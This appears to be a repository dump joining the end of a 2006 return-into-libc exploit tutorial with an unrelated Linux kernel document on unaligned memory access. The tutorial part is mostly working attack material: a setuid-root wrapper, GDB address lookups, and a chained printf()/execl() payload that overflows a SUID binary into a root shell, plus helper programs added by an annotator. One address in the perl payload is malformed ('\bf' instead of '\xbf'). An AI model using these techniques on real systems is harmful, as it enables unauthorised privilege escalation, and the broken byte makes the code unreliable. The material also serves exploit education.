348 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
349 | sh-2.05b$ whoami
350 | shaunige
351 | sh-2.05b$ exit
352 | exit
353 | [shaunige@localhost shaun]$
354 | 
355 | --END
356 | 
357 | 
358 | The exploit worked, and it needed 7 words of dummy data.  But wait, why don't 
359 | we have a rootshell?  ``vulnprog'' is SUID root, so what's going on?  'system()' 
360 | runs the specified command (in our case "/bin/sh") through /bin/sh itself, and 
361 | the shell drops its effective UID back to our real UID when the two don't 
362 | match, thus giving us a shell, but not a rootshell.  Therefore, the exploit 
363 | *did* work, but we're going to have to use a libc function that *doesn't* drop 
364 | privileges before executing the path specified ("/bin/sh" in our scenario).  
365 | 
366 | 
367 | #####################
368 | # Using a 'wrapper' #
369 | #####################
370 | 
371 | Hmm, what to do?  We're going to have to use one of the exec() family of 
372 | functions, as they execute the target directly rather than through /bin/sh, so 
373 | no privileges get dropped.  First, let's make our job a little easier and 
374 | create a little program that will run a shell for us (called a wrapper program).  
375 | 
376 | 
377 | --START
378 | /* expl_wrapper.c -- restores root privileges and spawns a shell */
379 | 
380 | #include <stdlib.h>     /* system()           */
381 | #include <unistd.h>     /* setuid(), setgid() */
382 | 
383 | int main() {
384 |     setuid(0);              /* regain full root uid (we run with euid 0) */
385 |     setgid(0);              /* and root gid                              */
386 |     system("/bin/sh");      /* spawn the shell                           */
387 | }
388 | --END
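
(Not shown in the article: compile the wrapper to the path the exploit will
reference later on, e.g. 'gcc expl_wrapper.c -o /home/shaunige/wrapper'.)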
389 | 
390 | 
391 | We need a plan: instead of using 'system()' to run a shell, we'll overwrite the 
392 | return address on the stack (EIP register) with the address of the 'execl()' 
393 | function in the libc library.  We'll tell 'execl()' to execute our wrapper 
394 | program (expl_wrapper.c), which raises our privs and executes a shell.  Voila, 
395 | a root shell.  However, this is not going to be as easy as the last experiment. 
396 | For a start, the execl() function needs a NULL as its last argument (the 
397 | argument-list terminator), but 'strcpy()' in vulnprog.c will treat a NULL (\x00 
398 | in hex) as the end of the string, making the exploit fail.  Instead, we can use 
399 | 'printf()' to write the NULLs at runtime, without any NULLs appearing in the 
400 | exploit buffer.  Our exploit buffer this time needs to look like this:
401 | 
402 | 
403 | --START
404 | 
405 | ---------------------------------------------------------------------------------------------------
406 | | GARBAGE | printf() addr | execl() addr | %3$n addr | wrapper addr | wrapper addr | addr of here |
407 | ---------------------------------------------------------------------------------------------------
408 | 
409 | 
410 | --END
411 | 
412 | 
413 | You may notice "%3$n addr".  This is the address of a format string for 
414 | 'printf()'; thanks to direct parameter access it skips over the two "wrapper 
415 | addr" addresses and places NULLs at the end of the exploit buffer.  This time 
416 | it is the address of 'printf()' that overwrites EIP, so 'printf()' executes 
417 | first and then returns into 'execl()', which executes our wrapper program.  
418 | This will result in a rootshell since vulnprog is SUID root.
419 | 
420 | 'addr of here' needs to be the address of itself, which will be overwritten by 
421 | NULLs when 'printf()' skips over the first 2 parameters of the 'execl' call.
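
If the %n trick seems like magic, here is a tiny stand-alone demo (my addition,
not part of the article): %n stores the number of characters printed so far
into the int pointed to by the matching argument, and since our exploit prints
nothing before the conversion, the value stored is 0 - exactly the NULL bytes
we need.  The '3$' prefix merely selects which stacked argument receives the
write.

--START
/* n_demo.c - NOT from the original article; shows what %n actually writes. */

#include <stdio.h>

int main(void) {
    int count = 12345;

    printf("hi%n", &count);         /* two characters printed, so count becomes 2 */
    printf(" -> count is now %d\n", count);

    count = 12345;
    printf("%n", &count);           /* nothing printed, so count becomes 0 */
    printf("count is now %d\n", count);
    return 0;
}
--END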
422 | 
423 | To get the addresses of the 'printf()' and 'execl()' libc functions, we'll 
424 | again write a tiny test program and use GDB to help us out.
425 | 
426 | 
427 | --START
428 | /* test.c */
429 | 
430 | #include <stdio.h>
431 | 
432 | int main() {
433 |     execl();     /* bogus calls - we never run past the breakpoint at main;   */
434 |     printf(0);   /* they're only here so the program references both symbols  */
435 | }
436 | 
437 | [shaunige@localhost shaunige]$ gcc test.c -o test -g
438 | [shaunige@localhost shaunige]$ gdb -q ./test
439 | (gdb) break main
440 | Breakpoint 1 at 0x804837c: file test.c, line 4.
441 | (gdb) run
442 | Starting program: /home/shaunige/test
443 | 
444 | Breakpoint 1, main () at test.c:4
445 | 4               execl();
446 | (gdb) p execl
447 | $1 = {<text variable, no debug info>} 0x400bde80 <execl>
448 | (gdb) p printf
449 | $2 = {<text variable, no debug info>} 0x4006e310 <printf>
450 | (gdb) quit
451 | The program is running.  Exit anyway? (y or n) y
452 | [shaunige@localhost shaunige]$
453 | --END
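
As an aside (my addition - the article sticks with GDB), you can also ask the
dynamic linker for these addresses directly with dlopen()/dlsym(), which should
report the same values:

--START
/* libcaddrs.c - NOT from the original article; resolves the libc addresses
 * of the functions we need via the dynamic linker instead of GDB.
 * Compile with: gcc libcaddrs.c -o libcaddrs -ldl */

#include <stdio.h>
#include <dlfcn.h>

int main(void) {
    void *libc = dlopen("libc.so.6", RTLD_LAZY);
    if (!libc) {
        fprintf(stderr, "dlopen failed: %s\n", dlerror());
        return 1;
    }
    printf("system() is at %p\n", dlsym(libc, "system"));
    printf("execl()  is at %p\n", dlsym(libc, "execl"));
    printf("printf() is at %p\n", dlsym(libc, "printf"));
    dlclose(libc);
    return 0;
}
--END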
454 | 
455 | 
456 | Excellent, just as we wanted, we now have the addresses of libc 'execl()' and 
457 | 'printf()'.  We'll be using 'printf()' to write NULLs (with the format string 
458 | "%3$n"), so we need to place the string "%3$n" somewhere in memory.  Using 
459 | %3$n to write NULLs works because it uses direct positional parameters (hence 
460 | the '$' in the format string): the '3' tells printf() to skip over the first 
461 | two arguments of the 'execl()' call (the address of our wrapper program, 
462 | followed by the same address again), and '%n' writes the number of characters 
463 | printed so far - zero - into the location after execl()'s second argument.  
464 | Let's use an environment variable again, due to past success with them.  We'll 
465 | also use an environment variable to store the path of our wrapper program, 
466 | which invokes a shell: "/home/shaunige/wrapper".
467 | 
468 | 
469 | --START
470 | [shaunige@localhost shaunige]$ export NULLSTR="%3\$n"
471 | [shaunige@localhost shaunige]$ echo $NULLSTR
472 | %3$n
473 | [shaunige@localhost shaunige]$ export WRAPPER_PROG="/home/shaunige/wrapper"
474 | [shaunige@localhost shaunige]$ echo $WRAPPER_PROG
475 | /home/shaunige/wrapper
476 | [shaunige@localhost shaunige]$ ./getenv NULLSTR
477 | NULLSTR is stored at address 0xbfffff5f
478 | [shaunige@localhost shaunige]$ ./getenv WRAPPER_PROG
479 | WRAPPER_PROG is stored at address 0xbffff9a9
480 | [shaunige@localhost shaunige]$
481 | --END
482 | 
483 | 
484 | We now have all of the addresses we need, except the last one: 'addr of here'. 
485 | This needs to be the address of that slot itself once the buffer has been 
486 | copied: 28 bytes of garbage plus five 4-byte addresses precede it, so it sits 
487 | at the address of the overflowable 'buf' variable + 48 bytes.  But how do we 
488 | get the address of 'buf'?  All we need to do is add an extra line of code to 
489 | vulnprog.c, recompile it, and we will have the address in memory of 'buf':
490 | 
491 | 
492 | --START
493 | [shaunige@localhost shaunige]$ cat vulnprog.c
494 | #include <stdio.h>
495 | #include <stdlib.h>
496 | 
497 | int main(int argc, char *argv[]) {
498 |     if(argc < 2) {
499 |         printf("Usage: %s <string>\n", argv[0]);
500 |         exit(-1);
501 |     }
502 | 
503 |     char buf[5];
504 | 
505 |     printf("addr of buf is: %p\n", buf);
506 | 
507 |     strcpy(buf, argv[1]);
508 |     return(0);
509 | }
510 | 
511 | [shaunige@localhost shaunige]$ gcc vulnprog.c -o vulnprog
512 | [shaunige@localhost pcalc-000]$ ../vulnprog `perl -e 'print
513 | "1234"x13'`
514 | addr of buf is: 0xbffff780
515 | Segmentation fault
516 | [shaunige@localhost pcalc-000]$
517 | --END
518 | 
519 | 
520 | With a little hexadecimal addition (48 decimal is 0x30), we can determine that 
521 | 0xbffff780 + 48 = 0xbffff7b0.  This address is the final argument of 'execl()', 
522 | the location where the NULLs will be written.  We now have all of the 
523 | information we need, so exploitation will be easy.  Again, I'm going to craft 
524 | the exploit buffer from the console with perl - let's get going!
525 | 
526 | 
527 | --START
528 | 
529 | [shaunige@localhost shaunige]$ ./vulnprog `perl -e 'print "1234"x7 . 
530 | "\x10\xe3\x06\x40" . "\x80\xde\x0b\x40" . "\x5f\xff\xff\xbf" . "\xa9\xf9\xff\bf" 
531 | . "\xa9\xf9\xff\xbf" . "\xb0\xf7\xff\xbf"'`
532 | 
533 | sh-2.05b#
534 | 
535 | --END
536 | 
537 | 
538 | Well, well, looks like our little exploit worked!  Depending on your machine's 
539 | stack layout, you may need more or less garbage data (used for spacing) at the 
540 | start of your exploit buffer, but it worked fine for us.
541 | 
542 | The exploit buffer was fed to 'vulnprog', overwriting the return address on the 
543 | stack with the address of the libc 'printf()' function.  'printf()' wrote the 
544 | NULLs into the correct place and then returned straight into 'execl()', which 
545 | executed our wrapper program as instructed; the wrapper invoked a shell (/bin/sh) 
546 | with the privileges of 'vulnprog' (root), leaving us with a lovely rootshell.  Voila.
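
To make the layout of the chained buffer easier to see, here is a sketch (my
addition, not from the article) that emits the same bytes as the perl one-liner
above, one slot per fwrite().  The addresses are the ones gathered earlier and
will differ on other machines.

--START
/* buildchain.c - NOT from the original article; prints the chained
 * printf()/execl() exploit buffer used above.  Assumes a 32-bit
 * little-endian x86 box. */

#include <stdio.h>

int main(void) {
    unsigned int chain[6] = {
        0x4006e310,   /* printf() - overwrites the saved return address      */
        0x400bde80,   /* execl()  - where printf() "returns" to              */
        0xbfffff5f,   /* $NULLSTR ("%3$n") - printf()'s format string        */
        0xbffff9a9,   /* $WRAPPER_PROG - execl()'s path argument             */
        0xbffff9a9,   /* $WRAPPER_PROG again - execl()'s argv[0]             */
        0xbffff7b0,   /* 'addr of here' (buf + 48) - zeroed by %3$n,         */
                      /* becoming execl()'s NULL terminator                  */
    };
    int i;

    for (i = 0; i < 7; i++)                  /* 7 words of garbage padding */
        fwrite("1234", 1, 4, stdout);
    for (i = 0; i < 6; i++)
        fwrite(&chain[i], 4, 1, stdout);
    return 0;
}
--END

Feeding its output to vulnprog with ./vulnprog "`./buildchain`" is equivalent
to the perl command above.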
547 | 
548 | 
549 | 
550 | ##############
551 | # Conclusion #
552 | ##############
553 | 
554 | I have hopefully given you a quick insight into an alternative to injecting and 
555 | executing shellcode when exploiting a stack-based overflow vulnerability in a 
556 | given program.  Non-executable stacks are becoming more and more common in 
557 | modern Operating Systems, and knowing how to 'return into libc' rather than 
558 | relying on shellcode can be very useful.  I hope you've enjoyed this article; 
559 | I appreciate feedback.
560 | 
561 | <shaun2k2@excluded.org>
562 | http://www.excluded.org
563 | 
564 | 
565 | # milw0rm.com [2006-04-08]
566 | 
567 | 
--------------------------------------------------------------------------------
/unaligned-memory.txt:
--------------------------------------------------------------------------------
1 | UNALIGNED MEMORY ACCESSES
2 | =========================
3 | 
4 | Linux runs on a wide variety of architectures which have varying behaviour
5 | when it comes to memory access. This document presents some details about
6 | unaligned accesses, why you need to write code that doesn't cause them,
7 | and how to write such code!
8 | 
9 | 
10 | The definition of an unaligned access
11 | =====================================
12 | 
13 | Unaligned memory accesses occur when you try to read N bytes of data starting
14 | from an address that is not evenly divisible by N (i.e. addr % N != 0).
15 | For example, reading 4 bytes of data from address 0x10004 is fine, but
16 | reading 4 bytes of data from address 0x10005 would be an unaligned memory
17 | access.
18 | 
19 | The above may seem a little vague, as memory access can happen in different
20 | ways. The context here is at the machine code level: certain instructions read
21 | or write a number of bytes to or from memory (e.g. movb, movw, movl in x86
22 | assembly). As will become clear, it is relatively easy to spot C statements
23 | which will compile to multiple-byte memory access instructions, namely when
24 | dealing with types such as u16, u32 and u64.
25 | 
26 | 
27 | Natural alignment
28 | =================
29 | 
30 | The rule mentioned above forms what we refer to as natural alignment:
31 | When accessing N bytes of memory, the base memory address must be evenly
32 | divisible by N, i.e. addr % N == 0.
33 | 
34 | When writing code, assume the target architecture has natural alignment
35 | requirements.
36 | 
37 | In reality, only a few architectures require natural alignment on all sizes
38 | of memory access. However, we must consider ALL supported architectures;
39 | writing code that satisfies natural alignment requirements is the easiest way
40 | to achieve full portability.
41 | 
42 | 
43 | Why unaligned access is bad
44 | ===========================
45 | 
46 | The effects of performing an unaligned memory access vary from architecture
47 | to architecture. It would be easy to write a whole document on the differences
48 | here; a summary of the common scenarios is presented below:
49 | 
50 | - Some architectures are able to perform unaligned memory accesses
51 |   transparently, but there is usually a significant performance cost.
52 | - Some architectures raise processor exceptions when unaligned accesses
53 |   happen. The exception handler is able to correct the unaligned access,
54 |   at significant cost to performance.
55 | - Some architectures raise processor exceptions when unaligned accesses
56 |   happen, but the exceptions do not contain enough information for the
57 |   unaligned access to be corrected.
58 | - Some architectures are not capable of unaligned memory access, but will
59 |   silently perform a different memory access to the one that was requested,
60 |   resulting in a subtle code bug that is hard to detect!
61 | 
62 | It should be obvious from the above that if your code causes unaligned
63 | memory accesses to happen, your code will not work correctly on certain
64 | platforms and will cause performance problems on others.
65 | 
66 | 
67 | Code that does not cause unaligned access
68 | =========================================
69 | 
70 | At first, the concepts above may seem a little hard to relate to actual
71 | coding practice. After all, you don't have a great deal of control over
72 | memory addresses of certain variables, etc.
73 | 
74 | Fortunately things are not too complex, as in most cases, the compiler
75 | ensures that things will work for you. For example, take the following
76 | structure:
77 | 
78 | struct foo {
79 |         u16 field1;
80 |         u32 field2;
81 |         u8 field3;
82 | };
83 | 
84 | Let us assume that an instance of the above structure resides in memory
85 | starting at address 0x10000. With a basic level of understanding, it would
86 | not be unreasonable to expect that accessing field2 would cause an unaligned
87 | access. You'd be expecting field2 to be located at offset 2 bytes into the
88 | structure, i.e. address 0x10002, but that address is not evenly divisible
89 | by 4 (remember, we're reading a 4 byte value here).
90 | 
91 | Fortunately, the compiler understands the alignment constraints, so in the
92 | above case it would insert 2 bytes of padding in between field1 and field2.
93 | Therefore, for standard structure types you can always rely on the compiler
94 | to pad structures so that accesses to fields are suitably aligned (assuming
95 | you do not cast the field to a type of different length).
96 | 
97 | Similarly, you can also rely on the compiler to align variables and function
98 | parameters to a naturally aligned scheme, based on the size of the type of
99 | the variable.
100 | 
101 | At this point, it should be clear that accessing a single byte (u8 or char)
102 | will never cause an unaligned access, because all memory addresses are evenly
103 | divisible by one.
104 | 
105 | On a related topic, with the above considerations in mind you may observe
106 | that you could reorder the fields in the structure in order to place fields
107 | where padding would otherwise be inserted, and hence reduce the overall
108 | resident memory size of structure instances. The optimal layout of the
109 | above example is:
110 | 
111 | struct foo {
112 |         u32 field2;
113 |         u16 field1;
114 |         u8 field3;
115 | };
116 | 
117 | For a natural alignment scheme, the compiler would only have to add a single
118 | byte of padding at the end of the structure. This padding is added in order
119 | to satisfy alignment constraints for arrays of these structures.
120 | 
121 | Another point worth mentioning is the use of __attribute__((packed)) on a
122 | structure type. This GCC-specific attribute tells the compiler never to
123 | insert any padding within structures, useful when you want to use a C struct
124 | to represent some data that comes in a fixed arrangement 'off the wire'.
125 | 
126 | You might be inclined to believe that usage of this attribute can easily
127 | lead to unaligned accesses when accessing fields that do not satisfy
128 | architectural alignment requirements. However, again, the compiler is aware
129 | of the alignment constraints and will generate extra instructions to perform
130 | the memory access in a way that does not cause unaligned access. Of course,
131 | the extra instructions obviously cause a loss in performance compared to the
132 | non-packed case, so the packed attribute should only be used when avoiding
133 | structure padding is of importance.
134 | 
135 | 
136 | Code that causes unaligned access
137 | =================================
138 | 
139 | With the above in mind, let's move onto a real life example of a function
140 | that can cause an unaligned memory access. The following function adapted
141 | from include/linux/etherdevice.h is an optimized routine to compare two
142 | ethernet MAC addresses for equality.
143 | 
144 | unsigned int compare_ether_addr(const u8 *addr1, const u8 *addr2)
145 | {
146 |         const u16 *a = (const u16 *) addr1;
147 |         const u16 *b = (const u16 *) addr2;
148 |         return ((a[0] ^ b[0]) | (a[1] ^ b[1]) | (a[2] ^ b[2])) != 0;
149 | }
150 | 
151 | In the above function, the reference to a[0] causes 2 bytes (16 bits) to
152 | be read from memory starting at address addr1. Think about what would happen
153 | if addr1 was an odd address such as 0x10003. (Hint: it'd be an unaligned
154 | access.)
155 | 
156 | Despite the potential unaligned access problems with the above function, it
157 | is included in the kernel anyway but is understood to only work on
158 | 16-bit-aligned addresses. It is up to the caller to ensure this alignment or
159 | not use this function at all. This alignment-unsafe function is still useful
160 | as it is a decent optimization for the cases when you can ensure alignment,
161 | which is true almost all of the time in ethernet networking context.
162 | 
163 | 
164 | Here is another example of some code that could cause unaligned accesses:
165 | void myfunc(u8 *data, u32 value)
166 | {
167 |         [...]
168 |         *((u32 *) data) = cpu_to_le32(value);
169 |         [...]
170 | }
171 | 
172 | This code will cause unaligned accesses every time the data parameter points
173 | to an address that is not evenly divisible by 4.
174 | 
175 | In summary, the 2 main scenarios where you may run into unaligned access
176 | problems involve:
177 | 1. Casting variables to types of different lengths
178 | 2. Pointer arithmetic followed by access to at least 2 bytes of data
179 | 
180 | 
181 | Avoiding unaligned accesses
182 | ===========================
183 | 
184 | The easiest way to avoid unaligned access is to use the get_unaligned() and
185 | put_unaligned() macros provided by the <asm/unaligned.h> header file.
186 | 
187 | Going back to an earlier example of code that potentially causes unaligned
188 | access:
189 | 
190 | void myfunc(u8 *data, u32 value)
191 | {
192 |         [...]
193 |         *((u32 *) data) = cpu_to_le32(value);
194 |         [...]
195 | }
196 | 
197 | To avoid the unaligned memory access, you would rewrite it as follows:
198 | 
199 | void myfunc(u8 *data, u32 value)
200 | {
201 |         [...]
202 |         value = cpu_to_le32(value);
203 |         put_unaligned(value, (u32 *) data);
204 |         [...]
205 | }
206 | 
207 | The get_unaligned() macro works similarly. Assuming 'data' is a pointer to
208 | memory and you wish to avoid unaligned access, its usage is as follows:
209 | 
210 | u32 value = get_unaligned((u32 *) data);
211 | 
212 | These macros work for memory accesses of any length (not just 32 bits as
213 | in the examples above). Be aware that when compared to standard access of
214 | aligned memory, using these macros to access unaligned memory can be costly in
215 | terms of performance.
216 | 
217 | If use of such macros is not convenient, another option is to use memcpy(),
218 | where the source or destination (or both) are of type u8* or unsigned char*.
219 | Due to the byte-wise nature of this operation, unaligned accesses are avoided.
220 | 
221 | 
222 | Alignment vs. Networking
223 | ========================
224 | 
225 | On architectures that require aligned loads, networking requires that the IP
226 | header is aligned on a four-byte boundary to optimise the IP stack. For
227 | regular ethernet hardware, the constant NET_IP_ALIGN is used. On most
228 | architectures this constant has the value 2 because the normal ethernet
229 | header is 14 bytes long, so in order to get proper alignment one needs to
230 | DMA to an address which can be expressed as 4*n + 2. One notable exception
231 | here is powerpc which defines NET_IP_ALIGN to 0 because DMA to unaligned
232 | addresses can be very expensive and dwarf the cost of unaligned loads.
233 | 
234 | For some ethernet hardware that cannot DMA to unaligned addresses like
235 | 4*n+2 or non-ethernet hardware, this can be a problem, and it is then
236 | required to copy the incoming frame into an aligned buffer. Because this is
237 | unnecessary on architectures that can do unaligned accesses, the code can be
238 | made dependent on CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS like so:
239 | 
240 | #ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS
241 |         skb = original skb
242 | #else
243 |         skb = copy skb
244 | #endif
245 | 
246 | --
247 | Authors: Daniel Drake,
248 |          Johannes Berg
249 | With help from: Alan Cox, Avuton Olrich, Heikki Orsila, Jan Engelhardt,
250 | Kyle McMartin, Kyle Moffett, Randy Dunlap, Robert Hancock, Uli Kunitz,
251 | Vadim Lobanov
252 | 
253 | 
--------------------------------------------------------------------------------